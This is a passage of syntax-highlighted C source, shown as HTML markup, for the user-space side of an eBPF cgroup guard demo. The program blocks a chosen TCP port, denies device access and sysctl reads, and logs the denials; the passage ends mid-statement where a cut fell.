&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;libbpf_print_level&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                           &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;va_list&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;level&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;LIBBPF_DEBUG&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;vfprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s"&gt;"Usage: %s [OPTIONS]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"Options:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -c, --cgroup PATH           cgroup v2 path (default: /sys/fs/cgroup/ebpf_demo)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -p, --block-port PORT       block TCP connect() to this dst port (IPv4)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -d, --deny-device MAJ:MIN   deny device access for (major:minor)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -s, --deny-sysctl NAME      deny sysctl READ of this name&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"  -h, --help                  show this help&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;EVENT_CONNECT4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;INET_ADDRSTRLEN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;in_addr&lt;/span&gt; &lt;span class="n"&gt;addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;s_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="n"&gt;inet_ntop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[DENY connect4] pid=%u comm=%s daddr=%s dport=%u proto=%u&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proto&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;EVENT_DEVICE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[DENY device]   pid=%u comm=%s major=%u minor=%u access_type=0x%x&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;access_type&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;EVENT_SYSCTL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[DENY sysctl]   pid=%u comm=%s write=%u name=%s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;cgroup_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"/sys/fs/cgroup/ebpf_demo"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;dev_major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dev_minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse command line arguments */&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;option&lt;/span&gt; &lt;span class="n"&gt;long_opts&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"cgroup"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;      &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'c'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"block-port"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'p'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"deny-device"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'d'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"deny-sysctl"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;required_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'s'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s"&gt;"help"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="n"&gt;no_argument&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sc"&gt;'h'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;opt&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;opt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;getopt_long&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"c:p:d:s:h"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;long_opts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;opt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'c'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cgroup_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'p'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'d'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="cm"&gt;/* parse major:minor */&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="sc"&gt;'s'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;optarg&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nl"&gt;default:&lt;/span&gt; &lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;libbpf_set_print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGINT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGTERM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create cgroup directory if needed */&lt;/span&gt;
    &lt;span class="n"&gt;mkdir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;0755&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_RDONLY&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;O_DIRECTORY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cg_fd&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"open(%s) failed: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;strerror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;errno&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open and configure BPF skeleton */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;cgroup_guard_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cgroup_guard_bpf__open&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"cgroup_guard_bpf__open() failed&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Write .rodata configuration (must be before load) */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;block_port&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;65535&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
